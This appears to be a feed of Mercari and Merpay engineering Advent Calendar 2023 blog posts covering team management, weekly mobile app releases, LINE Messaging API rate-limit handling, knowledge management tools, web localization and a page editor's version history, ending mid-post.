In some cases it might be a hard pill to swallow, some of the tasks engineers want to work on, might not align with company priorities, and this is where you need to step in.
As their manager it’s important to clarify the requirements, make them understand the reasons, have a normal conversation between adults and listen to their train of thoughts.

When things get delicate

Sooner or later you will be required to have critical conversations.
For example, there might be situations when the team is not in sync with company direction or would like to challenge some decisions.
These delicate conversations go very smoothly if you have your team’s trust.
It’s very important to keep an open mind, I generally try to foster these conversations because it’s how we grow as a team.
Multiple times in the past I had different opinions than the engineers. After listening to their point of view and explaining mine, we clarified and found compromises or different solutions.
With a team of Lead Engineers, these conversations happen weekly, and it’s great.
Every single task or piece of information is analyzed and challenged, and rightfully so.
When a team has experience and skills, it’s important to focus their time on meaningful tasks, their time is valuable. And they know it.

In some other cases, as their manager, you will have to fight for them, for the team.
Defending your team decisions and challenging stakeholders, it’s a very important part of the process that gains trust from both sides.

The good times

Day after day, slowly gaining trust will lead to being part of a team you can blindly rely upon.
This leads to great experiences, celebrating both wins and failures.
The feeling of knowing that your team will have your back, will lead to bolder challenges that lead to more trust and so on.
Working in a team like this is a privilege, sometimes companies underestimate the importance of it.
Luckily in Mercari, we were given all the necessary tools to thrive, from remote work anywhere in Japan, to team buildings to bukatsu clubs and so on.
The team works hard but also likes to celebrate together, and having casual regular team buildings in person is another invaluable tool.
Dedicating time simply for bonding, to talk about non work related topics, to know each other better, and have fun together, leads to even more trust, more motivation and overall happiness.

The future

Finally, it’s important to be prepared for the future.
When managing Lead Engineers, they know if your vision will pay off or not, they have been there before.
Making sure you are planning together, sharing your ideas, your goals, discussing your ideal scenario, and making them part of it, will help keep the team together.
Because it’s inevitable that as time goes on, things will change, people will move to different roles, maybe different teams or even companies.
Being ready to embrace change and be prepared for it, will minimize your team disruption.
It’s important to also to expect the unexpected, discuss every scenario with the team and make them understand that no matter what, you will be there to support them and lead them.

Eventually, some of them might take the management path, some might work alongside you, some maybe in other teams or even companies. But no matter what, the trust and respect will remain.

I look forward to another year of challenges, of wins and mistakes, and to celebrate them all with this amazing team.

Tomorrow’s article will be by @ayman. Look forward to it!

The art of streamlining mobile app releases

Tue, 12 Dec 2023 11:00:08 GMT

This post is for Day 12 of Mercari Advent Calendar 2023, brought to you by @fp from the Mercari Mobile Architects team.

So, you’ve probably noticed those Mercari updates popping up on your phone every week, right? Well, behind the scenes, it’s like a bustling beehive of developers, designers, and tech wizards working their magic to keep things fresh.

Picture this: teams of brainiacs tackling bugs, spicing up features, and making your Mercari experience top-notch. It’s like a non-stop party of creativity!

But here’s the kicker – getting all this awesomeness to your phone isn’t as easy as hitting the "send" button. Nope, it’s more like a high-tech dance involving rewritten apps, fancy coding languages, and this cool thing called a monorepo (think of it as the ultimate team hangout for iOS and Android).

And then there’s the drama of distribution – your Mercari updates don’t just magically appear. They make a grand entrance through the Apple App Store or Google Play Store, like VIP guests at a fancy party.

So, how do they pull off this tech extravaganza?
Three must-haves: a solid process, the right tools, and a squad of tech superheroes making sure everything runs smoothly.
It’s like orchestrating a blockbuster movie release, but for your Mercari app!

Let’s dive into the Mercari mobile release rollercoaster, and understand how the apps are delivered every week to your device.

Mobile tech stack

First, some background on Mercari mobile apps: we launched entirely rewritten apps last year, using Swift/SwiftUI for iOS, and Kotlin/Jetpack Compose for Android. You can read more details about it in this dedicated article.
We use a per-platform monorepo approach, this means all iOS teams commit in the iOS repository, and all Android teams commit in the Android repository.
Our CI/CD system leverages Bazel on iOS, and Develocity on Android, you can read more about our mobile infrastructure in this article (iOS), and this article (Android).

The process

This process has been fine-tuned over the years to handle the tech tango of updates.

Imagine a grand plan laid out in advance, complete with release dates and deadlines. But, hold on, because of holidays and events, the schedule might shimmy a bit. No worries, though – planning ahead lets each team synchronize their dance moves.

To ensure top-notch quality, each release faces the ultimate test – the "Release Judgement."
It’s a mix of cool automated tests and hands-on checks. Before this show begins, we need a release build with all the teams’ changes.
Every week, there’s a race against the clock as engineers hustle to commit their code before branch cut, hit up the CI to build and test it, and cross their fingers for a green light!

If all goes well, it’s off to the stores! But, if a glitch appears – a pesky bug or a regression – the team steps in. Options abound, from fixing on the fly to turning off feature flags. Skipping releases is a last resort – nobody wants to be left out of the release party!

Submitting to the stores is the fancy part, usually done automatically. Once approved, the release takes a leisurely stroll over the week, slowly reaching 100% rollout. We keep a close eye, ready to tackle any crashes or customer hiccups.
And just like that, when the app has conquered every corner, it’s time to hit replay for the next release!
But wait, there’s more behind the scenes – policies for rejections, handling production issues, and even a performance check to ensure the app is always in its prime.

The tooling

Now, let’s spill the beans on the tech magic behind our weekly Mercari app updates – our toolbox!
At Mercari, we’re all about using cool tools to make our app releases a breeze. This year, we added a shiny new tool to the mix called Runway. Picture it as the superhero of coordination, bringing together all the action in both iOS and Android releases.

Runway is like the backstage manager, linking different services and gathering all the juicy details in one spot. It’s not just a showstopper; it’s also a time-saver, automating bits and pieces of the process. Plus, it’s got this superpower – giving specific access to different folks. That way, everyone can pitch in without accidentally stepping on each other’s toes.
This wizardry extends to our internal scripts and CI magic, playing nice with our buddy Slack – our go-to for chit-chat. Picture this: every release gets its own secret hideout in Slack, where we track progress and dive into release gossip if needed.
But hey, we’re not resting on our laurels – we’re always jazzing up our toolbox to make the release gig even smoother. It’s like fine-tuning a favorite instrument for the perfect melody!

The team

Now, let’s shine the spotlight on the true heroes of our mobile release show – the dream team!
No doubt, the heart and soul of our smooth-as-butter release process is our fantastic squad of engineers. These aren’t just ordinary tech wizards; they’re the maestros who’ve shaped our process and tooling into what they are today.
Picture this: over the years, a bunch of these engineering legends have poured their heart and soul into setting up the gears and gadgets we rely on. And guess what? We’ve got a special A-team handling the release action.
This crew is a mix of QA engineers, Mobile Platform gurus, and rockstar Mobile engineers from different teams.
Because our releases are like a tech party for everyone, having this diverse mix is gold. The Mobile Platform team keeps the tools in tip-top shape, tweaking them for perfection. And the process gets a makeover every week, thanks to these tireless tinkers.
Now, not everyone is on stage every week – we’ve got this cool round-robin process going on. The release owners take turns, ensuring a fresh vibe each time. And to keep things in check, we’ve got our dedicated QA and Mobile Platform pals monitoring the backstage magic.
Let’s talk real talk – these champs make the magic happen every week. And if some inevitable hiccup occurs (because, let’s face it, tech has its moments), we can count on this dream team to swoop in, fix things up, and ensure the show goes on.
And hey, in the past year alone, this crew has dropped over 100 releases! Now, that’s a round of applause-worthy performance! 👏🎉

What’s next?

In the grand finale, even though our release process is like a well-choreographed dance, there’s always room for improvement. We’re on a mission to dial up the automation, kicking manual steps to the curb. Testing and some hands-on tweaks are on our hit list for full automation.

Looking ahead, our dream is a fully automated spectacle – a daily extravaganza where everything from building to testing happens like clockwork, with a bold delivery target of under an hour. It’s the next step in our tech evolution, and we’re reaching for the stars!

Tomorrow’s article will be by me again. Look forward to it!

Flow Control Challenges in Mercari’s LINE Integration

Tue, 12 Dec 2023 10:00:18 GMT

This post is for Day 12 of Merpay Advent Calendar 2023, brought to you by @Liu from the Mepay Growth Platform team.

Introduction

You might have noticed that Mercari has started a LINE official account from 9/19 and we have more than 3,500,000 friends as of 2023/12.

After adding the Mercari official LINE account as a friend, customers can link their LINE account with Mercari account for a more personalized experience. Depending on whether they’ve linked their accounts, customers get different kinds of customized messages and rich menus that suit their preferences.
In this blog post, we’ll take a closer look at the LINE Messaging API, the powerhouse behind these interactions, and dive into the behind-the-scenes challenges faced by our backend engineers while using it.

Overview

Let’s begin by understanding how we engage with LINE and where we apply the LINE messaging API in our interactions.

Our marketers connect with LINE customers using two main avenues: Braze, a third-party platform, and the LINE official account manager, LINE’s own management platform.

We maintain both routes for distinct advantages. Through Braze, we can precisely target audiences based on in-app behavior, such as recent Mercari usage or a purchase within the last month. This route also allows us to send customized messages tailored for customers who have linked their Mercari accounts.

On the other hand, the LINE official account manager route enables us to target audiences using LINE-specific information like age, gender, or interaction with previous LINE messages. The customer-friendly interface here also makes it easier for marketers to configure message layouts.

Now, why do we need an integration system in the Braze route? While Braze offers webhook templates for direct LINE messaging API usage, we’ve chosen not to utilize them for two key reasons. Firstly, for privacy concerns, we avoid uploading our customers’ LINE IDs to a third-party platform. Additionally, when sending customized messages, such as recommending items based on customers’ saved search conditions or browsing history on Mercari, direct interaction with Mercari microservices is necessary. This interaction isn’t feasible using Braze alone.
An example of customized message based on customers’ saved search condition:

Transitioning from our integration system to LINE, the LINE messaging API takes center stage. This API facilitates message delivery, rich menu switches, audience management, and various other functionalities.

Messaging – Cloud Functions & Pub/Sub

Our first challenge involves implementing effective flow control when utilizing the LINE messaging API for message delivery.

Our LINE integration system encompasses two messaging scenarios: proactive and reactive. For now, we’ll delve into proactive messaging, where marketers coordinate campaigns through Braze.

In this scenario, our backend engineers grapple with the task of efficiently handling large-scale LINE message deliveries. Initiating a campaign on Braze can result in a sudden influx of millions of requests, presenting a significant challenge. It’s crucial to manage this surge, considering the diverse rate limitations imposed by the LINE API and various Mercari services. Failing to adhere to these limits could trigger a cascade of errors or potentially lead to a service outage.

To overcome this challenge, we’ve established a robust system utilizing cloud functions and Pub/Sub events for processing webhook events. Initially arriving as HTTP requests from Braze, these webhook events undergo a transformation into Pub/Sub events. Cloud Function, with unlimited autoscaling support, ensures smooth operations even during high traffic from Braze. Line workers then pull Pub/Sub messages, allowing precise control over the number of messages processed per second and facilitating effective flow control.

This transformative process guarantees seamless flow control, enabling us to efficiently manage the diverse rate limits.

While the reactive scenario is set for release next year, we anticipate applying similar techniques. The event-to-Pub/Sub transformation remains crucial for sustaining effective flow control. Looking ahead to potential chatbot functionalities, especially those based on Language Model (LLM) technology, this finely tuned flow control mechanism becomes even more critical due to the stricter rate limitations of the OpenAI endpoint. Achieving a balance between timely responses and deferred processing is key to optimizing our interaction capabilities with customers.

Audience Group – Spanner & Cron Worker

The second challenge involves an advanced flow control mechanism utilizing Spanner and a cron worker.

Before delving into the details, let’s provide some context. LINE’s narrowcasting feature enables the selection of audience segments for message casting. For customers who haven’t linked their LINE account and Mercari account, we utilize an audience group comprising all linked customers and perform a reverse selection for effective narrowcasting. This narrowcasting is scheduled and executed using the LINE official account manager, while our LINE integration system manages the audience group using LINE messaging API.

When launching campaigns to encourage customers to link their LINE Mercari accounts, peak linking times result in heightened incoming traffic for our system. This surge triggers a sequence of processes, each demanding meticulous attention. The system executes various actions, such as sending greeting messages, switch rich menus and adding customers to an audience group.

However, as we manage outgoing traffic, it’s imperative to operate within the defined rate limits. Specifically, we adhere to a rate limitation of 60 requests per minute for adding audience members and 2,000 requests per second for sending messages.

To manage rate limitations on the endpoint for adding audience members, a crucial element in customer linking, we’ve established an advanced flow control process. Real-time welcome messages and rich menu switches are promptly dispatched, while customer additions to the audience group are systematically orchestrated by a separate worker with cron tasks running inside.

This meticulous approach ensures not only real-time customer engagement but also compliance with stipulated rate limitations, maintaining a harmonious system operation. Introducing a Spanner table between the worker overseeing linkage events and the cron worker adds an extra layer of control and organization.

The Spanner table schema is as follows:

CREATE TABLE LineLinkageUsers (
    ID STRING(36) NOT NULL,
    LineID STRING(64) NOT NULL,
    LineAudienceStatus INT64 NOT NULL,
    Created TIMESTAMP NOT NULL OPTIONS (
        allow_commit_timestamp = true
    ),
    Updated TIMESTAMP NOT NULL OPTIONS (
        allow_commit_timestamp = true
    ),
) PRIMARY KEY(ID);

The linkage worker inserts a record into this Spanner table when a customer links their accounts. The cron worker retrieves customers not yet added to the audience group from the Spanner table by the LineAudienceStatus, calls the audience adding API every 3 minutes for a group of customers, and updates the LineAudienceStatus to flag the customers as added.

Another critical aspect of this process is acknowledging the existence of a maximum number of concurrent operations, precisely set at 10 for the audience adding endpoint. This consideration becomes particularly significant when there’s an abundance of customers in the requests over the past 10 calls. While the actual addition occurs seamlessly in the background on the LINE server, the potential for encountering 409 errors arises if 10 concurrent adding processes are in progress.

To address this challenge, potential solutions involve limiting the maximum number of customers added in each request or incorporating a confirmation step before each request. This confirmation step, executed using the endpoint GET https://api.line.me/v2/bot/audienceGroup/{audienceGroupId} provided by LINE, allows for a proactive check on job process status. By ensuring there are no more than 10 requests already running, we can effectively prevent encountering 409 errors.

Conclusion

In conclusion, our journey through Mercari’s LINE integration challenges sheds light on the crucial role of flow control. By establishing a connection between Braze and the LINE official account manager, we enhance customer engagement through personalized messaging. Exploring the intricacies of the LINE Messaging API, we highlight the need for a dedicated integration system. In proactive messaging, our robust system efficiently handles large-scale LINE message deliveries, ensuring compliance with various rate limitations. The Audience Group management, utilizing Spanner and Cron Workers, adeptly manages peak traffic during customer linkage. As we anticipate the release of reactive scenarios and potential chatbot functionalities, maintaining effective flow control remains vital. In navigating these challenges, Mercari continues to optimize customer experiences through a seamless LINE integration.

Thank you for taking the time to read until the end. Here is a QR code to add friends to our official LINE account now! 😀

Tomorrow’s article will be by @abcdefuji. We hope that you are looking forward to it!

In search of a knowledge management silver bullet

Sun, 10 Dec 2023 11:00:57 GMT

Featured image by Mitya Ivanov via Unsplash

This post is for Day 10 of Mercari Advent Calendar 2023, brought to you by @rey from the Mercari Knowledge Management team.

In this post, Rey discusses how a specific knowledge management tool may not matter as much as how you use the tool as a company; as well as the high-level relationship between search, navigation, and content discovery.

"Have you ever come across other software that aims to fulfill the same role, but works better overall?"

A few months back, the knowledge management team had provided coworkers with a quick rundown of the basics of Confluence, one the knowledge management tools we use at Mercari.(Why these types of training or open doors are important, we will explore a little more closely later.) After the session, security engineer and fellow Mercarian Viktor Ferter approached me with a follow-up question.

I had a kind of off-topic question, if you have time…

I see a lot of companies defaulting to the Atlassian suite for information management and tracking… Have you ever come across other software that aims to fulfill the same role, but works better overall?

I also feel like the biggest problem with these is a lack of a “bird’s eye view”. They are pretty easy to navigate within one team’s space but my job is usually across many teams in the org, and it’s very difficult to find the correct page without help from the team itself. Searching by something like “recently active,” “most viewed,” or “most linked to” would be pretty useful if Confluence could do that?

Basically, some of the most central aspects of these questions amounts to: (1) what’s the best tool to manage knowledge, and (2) within such a tool, what’s the best way to find knowledge?

It’s a pretty safe bet many readers have felt this way. How can we know more at work, and do so better and faster? Knowledge is, after all, power. And because empowering our software development (or in whichever industry you are engaged) improves our market performance, this search for a knowledge management silver bullet is a worthwhile quest.

So, Rey, master of knowledge, tech writer extraordinaire, pray tell us: What is the meaning to knowledge management life?

“Could it be better? It can. But, can it be worse? Yes.”

500 years ago, before Confluence or Google Docs existed, Saint François de Sales avait dit : «Fleuris, là où Dieu t’a planté». Translated, this reads, “Blossom, there where God planted you.” Efforts have the best chance of succeeding if they embrace the context whence they came. In other words, speaking on a case-by-case basis, you should always try to use the closest-to-native tool. The language “THIS SIDE UP” is best published directly on the package that must stay right-side up – not (merely) on the company site’s documentation section. Readme’s are better documented and updated in the source code repo, not on a Confluence page, nor should the readme merely link to such a page. A Confluence page that collects the links to the most important repos and presents them with short accompanying descriptions is a useful extension, but an extension nevertheless.

Again, as a first step, sticking closest to native will prove most effective. One might think, “Well, we use Slack all day, what about Slack notes?” … No. There are clearly limited tools, and their utility would be equally constrained. As a note-keeping tool, Slack notes might work. As a directory for team-related content, probably less so. Similar to the idea behind the serenity prayer, just because you can do something, doesn’t mean you should. Using a sports car to tow a boat is an easy way to damage both, and using tools because they’re built-in or “the way things have been done” (think: saving links to email chains to adding sheets to already massive spreadsheets) is an easy way to damage the quality of knowledge retained and the experience of the reader accessing it.

In this way, we return again to the question, “Well, then, so what is the best tool – generally speaking?” Well, generally speaking, if you were to run an internet search on enterprise knowledge base tools and pick the one that best matches your use case, pre-existing tooling, and budget, you would be mostly fine. As John Jurasek, the classiest food critic on YouTube puts it, “Could it be better? It can. But, can it be worse? Yes.” You have to embrace what you’ve got as a company. “Embrace” here means to centralize as an organization on actually using and maintaining the preferred solution, and providing training, awareness, and guidelines to help members contribute and feel comfortable and confident doing so. If a potential author has uncertainty or anxiety around “I’m not sure I know what to do,” even just one ounce of that discomfort is enough to get them to go rogue and spin up a new knowledge base or, worse, output nothing at all.

But, even in the internal training we use, we stipulate clearly: don’t embrace your tooling too much. Don’t get carried away with customizing macros or Myspace-ifying templates or layouts. Again, yes, use some of these features, at least the basic ones, and feel comfortable using them, but that’s it. The finer and more intricate the involvement becomes, (1) the more it becomes fragile (likely to break) and sticky (hard to migrate away from), and, more importantly, (2) the less time you spend on the actual content. Focus on substance, not form.

Finally, if your company is using Confluence, but you think Notion is better, or your team is using Jupyter Books, but you swear by Obsidian, consider the truth behind the adage about grass and it being greener on the other side of the fence. We spend all day on our lawn, in our garden. We know all the dead patches that need reseeding, and all the spots with outbreaks of indigenous weeds. Looking at our neighbors lawn in the distance, all we see is an emerald field of green. Oh! Would that we could detach from our ego and realize that our neighbor feels the same way about us!

It might actually be the case that you may prefer a solution because you are more familiar, not necessarily because it is better. In fact, it is unlikely that any solution entirely solves the fundamental challenges of technical documentation or knowledge management, because I’m not convinced those challenges are not entirely solvable. There are better and worse ways to deal with issues, and this comes down to matters of strategy, technique, and organizational rules, not so much the tool at hand, but at the end of the day you will still have to deal with the intrinsic issues.

“You’re not that guy, pal, trust me.”

One of those intrinsic knowledge management issues is content discovery. Finding stuff. With everyone in agreement about contributing to your organization’s knowledge base, you’re on your way to addressing the first issue, but what about the search, and what about the navigation? Search and navigation are related, but distinct topics.

Search is just plain never good. This is the bane of our times. When Google first came out, it certainly did blow AskJeeves out of the water, and it was a magical time for PageRanked search, indeed. These days, “curation” and motivations behind black box algorithmic manipulation threaten to cast us back to a state of bumbling ignorance about the digital world around us. That’s all to say, don’t rely too heavily on it: search is not that guy, pal.

Interestingly enough, AI, or A-Lie as some have taken to calling the more gimmicky solutions, does offer some hope in the case of knowledge management strictly within an organization. One of the most notable issues with (generative) AI is that it is based on empirical, and perhaps legally questionably obtained, source data. Whether or not that data is actually true is alarmingly ignored in chatbot responses. That is, depending on the input data, a query of “How do I make fresh orange juice?” could just as confidently be answered with, “Sure thing! First, take 12 medium-to-large size lemons…” However, when the input data is limited to all, and only, text which has been produced by internal employees, the likelihood of useful data, to say nothing of relevance, can increase significantly. So, to the issue of search, it does seem that an answer, at least for the next step, lies in technologies like LLMs.

As for navigation, there is more hope. One of the most effective techniques we can use to improve the navigation of our documents is to bake it into the text: navigation should be contextual and interlinked. It’s been about 20 years since we’ve had a proper web and it seems the idea of “hypertext,” specifically “hyper links,” is still slow on the uptake. One of the worst things you could do is write a 800 word page about your team’s tool and how to use it, and have no links whatsoever on the page. Or, if you operate in more of a business capacity, to write a 3-page proposal that references in text other company projects or history, but you do not take the time as an author to track down those resources and link to them in the document. That is a large part of the essence and value of technical writing: 1 person spends an extra 10 minutes expressing a point more clearly so that 100 other people won’t have to.

On a closing note to hyperlinked navigation, consider the tourism industry. A traveler should go see La Tour Eiffel, or مجمع أهرامات الجيزة, or the Empire State Building. But you don’t then go to France to pick up the tower, or to Egypt to uproot the Pyramids, or New York to grab the skyscraper, and then bring them all back to your country. You leave them where they are (and so we return on our journey back to Saint de Sales). Any focus on explicit, tree-like “navigation” should ensure that it is secondary to the quality of the content itself, especially with respect to hyperlinking, and with clear ownership and gentle reminders for maintenance.

“Write as much as you can carry”

With respect to search, or navigation, or even tooling, say, in the case of migrating, everything is easier to find or handle – and more likely to be true, if there is less volume, and if more people are involved in maintaining those resources (NB: Not in administering, just maintaining). Regardless of your tool or your page tree, maintain constant vigilance ensuring the resources in your knowledge base are clear, complete, concise, and consistent.

Ten Tips to Improve Your Technical Writing, the article I published for last year’s Advent series, opens with the first tip “Try to say it in less.” I kept this open-ended because it’s turtles all the way down: less words, less images, less steps, less pages, less documents: less. In a knowledge base, the same applies. But, I warn you: don’t reduce volume by gatekeeping before the fact with numerous, complicated, or strict governance. That just encourages little rebellions.

In Mercari’s Knowledge Management team, we like the phrase “sensible governance.” You reduce after the fact, in a 改善 kaizen spirit of continuous improvement, constantly manicuring your organization’s garden of knowledge. Have “docs days” to ensure ownership or archive outdated pages, or note that both of these frequently accompany turnover, so put processes in place to improve knowledge transfer. Run analytics on documents to help identify what seems useful, what needs help, and what needs to go. Not updated in 631 days? Adios.

A tech writer at Google (whose name I cannot find in my notes, but I’ll update this article once I come across it again) said, “Write as much as you can carry.” I agree with this 95%. But, I would say write more, since it won’t all work out. Docs and drafts, ideas and proposals, trackers and templates – most of the time, we don’t end up using it, or not in the way we intended. So, let it be published; publish it as it comes to you, just remember to remember it. You can always snip to cut roses, but you cannot snap to grow them.

Happy Holidays and Happy New Year

The Japanese word 粘り強く is defined as “tenacious; persevering; persistent; stubborn; steadfast.” It’s partly pronounced “nebari” and coincidentally sounds like the English “Never” (give up). Never give up! Though the search for a KM silver bullet may seem daunting, you must be dauntless in your commitment to providing your organization and your customers with excellence in documentation.

Thank you for sharing your time to trace my meandering thoughts. I’d like to close with a quote from my article last year:

Over the holiday and year-end season, I hope you find time to relax, enjoy good company, and perhaps think a little about writing. Better documentation makes the world better. I envy the delight of your readers as they get the answers they need and expand their knowledge with the great content that I know you can write. As they say in Mercari, Go Bold!

Tomorrow’s article, for the 11th day of Mercari Advent Calendar will be by @ayman from the Architect team. Please look forward to it!

t9n, i18n, l10n, g11n?!

Fri, 08 Dec 2023 11:53:26 GMT

This post is for Day 8 of Mercari Advent Calendar 2023, brought to you by @wills from the Mercari Cross Border Team.

Introduction

The magic of websites lies in their ability to connect with users globally. However, not everyone speaks the same language, and misunderstandings can lead users to bid farewell to your site. To avoid this, it’s crucial to embrace multi-language support. In this article, we’ll explore the world of internationalization and localization on the web and peek into how Mercari is currently managing it all.

Decoding the Abbreviations

Ever stumbled upon abbreviations like t9n, i18n, l10n, and g11n? Let’s demystify them together:

Translation (t9n): The simple act of converting text from one language to another. Like turning English "hello!" into Japanese "こんにちは！".
Internationalization (i18n): As a web developer, i18n is probably the most common abbreviation you will encounter among this list. i18n is the process of designing software which can handle different languages, e.g., using an i18n library to manage and display the appropriate language strings instead of hard coding strings in the UI.

// i18n using i18next library for React
import { useTranslation } from 'next-i18next'

export const Footer = () => {
  const { t } = useTranslation('common')

  return (
    <footer>
      <p>{t('common:footer.menu.about.label')}</p>
    </footer>
  )
}

// VS no i18n
export const Footer = () => {
  return (
    <footer>
      <p>About Mercari</p>
    </footer>
  )
}

Localization (l10n): This step uses i18n to display content in a way that meets users’ language preferences. Translators play a vital role here, translating phrases like "About Mercari" to "メルカリについて."
Globalization (g11n): The fusion of i18n and l10n, ensuring your website caters to a global audience seamlessly.

i18n on web

Language Preferences

Determining a user’s language preference is key to enabling localization. Websites achieve this through settings, either integrated directly or relying on the user’s browser settings.

Caption: Language setting in chromium based browsers

Language Codes

We can access users’ preferred language preference in JS through navigator

window.navigator.language  // 'en-US'
window.navigator.languages // ['en-US', 'ja']

Notice the language code’s two parts, with the secondary indicating the region. For instance, en-US refers to English used in the United States as opposed to en-GB which is English used in the Commonwealth.

Browser page level translation

Most modern browsers boast built-in translation capabilities, making your content accessible to a broader audience.

Chrome

Caption: Original Mercari website in Japanese. https://jp.mercari.com/

Caption: Chrome browser page translation Chrome has page translation built in. It uses Google translation engine, which produces very good translations.

Edge

Caption: Edge browser page translation Edge similarly has page translation built in.

Safari

Caption: Safari browser page translation. Safari browser page translation goes a step further by recognizing and translating texts inside images.

Firefox

Caption: Firefox browser page translation. https://www.amazon.co.jp/

Firefox browser requires an extension (in beta). It also does not support many languages. Though it has a positive side that all you translations are done locally, perfect if you are strict about privacy

How Companies Handle Localization

There are various ways companies can implement locations. Roughly speaking we can divide text into 2 types: static and dynamic. Texts in menus, header, and footer are common examples of static texts. They are known beforehand and allow translators to take their time to translate it before releasing it. Dynamic contents are trickier, texts such as product names and descriptions keep changing and are simply too large for translators to handle.

Caption: Stripe website in Japanese and English. https://stripe.com/

Caption: Amazon website in Japanese and English. https://www.amazon.co.jp/. So how does companies like Stripe and Amazon enable localization?

In-House Translators

Various companies handle l10n internally. Internally, companies have translators that translate the texts and store it in databases or content management systems.

Dealing with Dynamic Content

The downside with in-house translations is when there is dynamic content. When there are large amounts of texts that keeps changing, translators have no time to translate the string manually. With the rise of AI some websites choose AI to help with the translation.

Caption: Toshima city has modal on the bottom left side to switch languages powered by AI. https://www.city.toshima.lg.jp/index.html.

Fetching Data

Regardless of translation method, the client will need to get the translations. The client can request these translations directly from their content management system, usually in json format. The client can also request it through the server. Clients communicate their preferred language through Accept-Language request http header.

Accept-Language: ja

l10n in Mercari

Dev only

At Mercari, with an international team of engineers, English pages are crucial for effective development. Most of our target audience are Japanese users. Because of this, we have only enabled English pages in development for a couple of years.

Flow and integration with Memsource

Mercari Frontend relies on the i18next library to manage localized strings. The workflow involves designers creating projects with Japanese text, engineers implementing both Japanese and English texts, and in-house translators managing translations through phrase. Once ready, engineers pull English translations from Phrase.

End

There are a lot to consider when implementing localisation. From which framework to use to whether to implement it yourself or simply rely on the browser. The whole i18n/l10n problem is far from being solved, and we are working hard everyday trying to figure it out ourselves.

Thank you so much for reading. I hope this article teaches you something new <3.

Tomorrow’s article will be by Osari. Look forward to it!

Enhancing Collaboration and Reliability: The Journey of Version History in our Page Editor Tool

Thu, 07 Dec 2023 10:24:10 GMT

This post is for Day 7 of Merpay Advent Calendar 2023, brought to you by @malli and @ben.hsieh from the Mepay Growth Platform Frontend team.

Preface

We’re from the Merpay Growth Platform Frontend team. Our team has focused on CRM criteria for many years. We build tools and services to help marketers to reach our customers. One of the greatest hits among these tools is a WYSIWYG page builder that allows marketers to create interactive content with small-to-zero engineering effort involved.

BlockQuote: We had a talk in Merpay & Mercoin Tech Fest 2023, if you’re interested in the concept and detail of this page builder please visit this link:

https://events.merpay.com/techfest-2023/en/#day-1_session8

Nowadays, Mercari’s marketers are creating web-based content on this platform day by day as an important part of our marketing operations. In order to make this process more efficient, the team continuously introduces handy functionalities to make the experience similar to most of the design tools, like Undo/Redo and cross-application copy-pasting functionality. Those are great but there’s one big missing piece we still need to solve, that’s about team collaboration.

Imagine owning a WYSIWYG application with 100s of marketers editing 1000s of pages every month. As the number of users(marketers) increases, with every page being public and open to edit for all, arises the most annoying problem- users overriding others’ pages unknowingly. Consider this- you are a marketer, you spend 2 hours creating a campaign that will go live soon. Saved the changes, went to bed to continue working from the next day, and when you wake up and see, all your changes are probably gone. Why? Because, someone else who is lazy to create a new page wanted to experiment with something and they felt free to edit on your page which shows on top of the list as it’s recently edited.

We faced a similar challenge. With features ranging from creating UI components, to fetching from APIs/mocking their data, using conditional statements to context and auto completion, EP pages(※) provide end-to-end features starting from implementing a design to publishing it in webviews without writing any code (at least most of the time 😉).

At that point, our page editor only allows a single user to edit the page. Multiple users editing a page could result in conflicts, so people working on the same page need to ask “Can I edit the page now?” over slack when it comes to collaboration. This made us think about the possibility of supporting concurrent editing.

※：EP-Pages is a marketing tool which provides a WYSIWYG editor that is used to make and publish campaigns with close to zero code.

The Ultimate Goal

Achieve Concurrent Editing

For multiple users to be able to edit on the same page in parallel. To achieve this we will have to do the following(in very brief):

Continuously push the changes from the users’ local machine to the server and conduct conflict resolution if there are any conflicts.
Most famous conflict resolution algorithms are OTs (Operational Transformation, used by Google Docs) and CRDTs(Conflict FreeReplicated DataTypes, used by Figma). CRDT is more apt for us as our data is mostly in object format. OT is more apt for text-editor kind of applications.
The above two steps are highly challenging and time and effort consuming, but we wanted to go as close to making the UX perfect! So we broke down the steps. The initial step in the journey towards collaborative editing would be to let the users know that there are multiple users editing the same page. For that we used firebase realtime updates to alert users when there are other users editing the same page.

BlockQuote: An alert will be blinking on the TopPanel when there are multiple users editing the same page.

Now, the second challenge: someone making changes and saving in the page created by you and you end up losing your work. Hurts the most. So we will need a mechanism in which no user would lose their work. They should be able to see their work and get back to the same point where they left off last time even if there have been newer changes done. And this is when we decided to implement page-history. And the rest of the article explains why we chose to implement this and how we did and what we plan for the future.

Why Page History?

There are two main reasons why we need it. Firstly, it serves to safeguard users’ work from potential loss. Secondly, it provides a means to distinguish and track individual users’ modifications, which can be helpful in resolving conflicts when necessary.

Our Team’s Journey to Enhancing Concurrent Editing and Reliability in Our Page Editor Tool

In our quest to improve the capabilities of our page editor tool, we focused on two key aspects: concurrent editing and reliability.

First and foremost, we recognized the importance of saving every version of a page whenever a user makes changes. Additionally, it was crucial to attribute these changes to the respective user. To achieve this, we implemented a new subcollection within each page document in Firebase. Within this subcollection, we stored the schema of the page along with the user’s ID who made the changes. This way, every time a user saves the page, it is stored separately in this subcollection, ensuring a comprehensive history of changes.

Of course, it was equally important for users to be able to access and view all the versions of a page. To address this, we introduced the history panel in our app. Located on the right side, this panel allows users to easily check and navigate through all the available versions. By simply clicking on a version, users can instantly view the corresponding state of the page in the editor shell.

Now, here’s where things get interesting.

Addressing Unsaved Changes and Bookmarked History Versions

We encountered a challenge: what if a user is currently making changes to a page but wants to explore other versions?

Ideally, we wouldn’t want users to switch versions if there are unsaved changes. However, we also understood that users might want to refer to previous versions while editing. To strike a balance, we made it possible for users to open a different version even if there are unsaved changes. However, to protect their current work, we open the selected version in a separate tab.

While this approach may not provide the best user experience, it ensures that users can freely explore different versions without losing their progress. In the future, we plan to implement a feature that checks for unsaved changes and prevents users from switching versions until they save their work.

Later, to address potential issues with unsaved changes, we implemented a quick fix. If a user tries to reload or change routes before saving their changes, we display an alert to prevent any accidental loss of data. In the future, we plan to leverage the browser’s indexDB to track local changes, ensuring a more robust solution.

We also considered the scenario where users want to discard their unsaved changes and move to a different version. To make this process smoother, we added an option in the history panel that allows users to discard their existing unsaved changes at any point.

As the number of history versions grows, it becomes challenging to identify key or important versions, especially for big campaigns. To address this, we plan to introduce an option to bookmark history versions. These bookmarked versions will be displayed in a separate tab within the history panel, acting as a filter and making it easier for users to navigate through their preferred versions.

Publish desired version and providing description

